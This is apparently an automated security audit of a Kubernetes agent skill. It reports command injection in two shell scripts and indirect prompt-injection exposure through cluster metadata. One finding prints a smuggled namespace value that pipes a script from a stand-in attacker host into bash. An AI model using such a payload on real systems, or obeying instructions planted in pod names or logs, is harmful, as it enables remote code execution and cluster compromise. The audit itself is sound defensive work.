The Agent Skills Directory

COMMAND_EXECUTION (HIGH): The script scripts/security-audit.sh is vulnerable to shell command injection.
Evidence: The variable $NS_FLAG is constructed using the user-supplied $NAMESPACE argument and then used unquoted in commands like kubectl get pods $NS_FLAG. An attacker providing a namespace like default; curl attacker.com/shell | bash would trigger the execution of the injected command.
COMMAND_EXECUTION (HIGH): The script scripts/generate-manifest.sh is vulnerable to command injection through shell expansion in heredocs.
Evidence: The script uses cat << EOF to generate YAML manifests using variables like $NAME and $NAMESPACE. Because the EOF delimiter is unquoted, the shell will perform variable expansion and command substitution (e.g., $(command)) inside the heredoc before it is output. If the agent interpolates untrusted data into these arguments, it could lead to arbitrary code execution.
PROMPT_INJECTION (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8) due to its extensive use of cluster metadata as input for management tasks.
Ingestion points: Multiple scripts (cluster-health-check.sh, pre-upgrade-check.sh, security-audit.sh) ingest pod names, status messages, and event logs via kubectl.
Boundary markers: None. Data is read directly into shell variables or printed to stdout for the agent to process.
Capability inventory: The skill possesses high-privilege capabilities including draining nodes, syncing ArgoCD applications, and generating security manifests.
Sanitization: While scripts use jq for structured data parsing, there is no sanitization of string content (like pod names) that might contain malicious instructions targeting the agent's logic.
CREDENTIALS_UNSAFE (SAFE): scripts/generate-manifest.sh contains placeholder credentials (e.g., your-api-key-here). These are clearly illustrative and do not represent a leak of active secrets.

kubernetes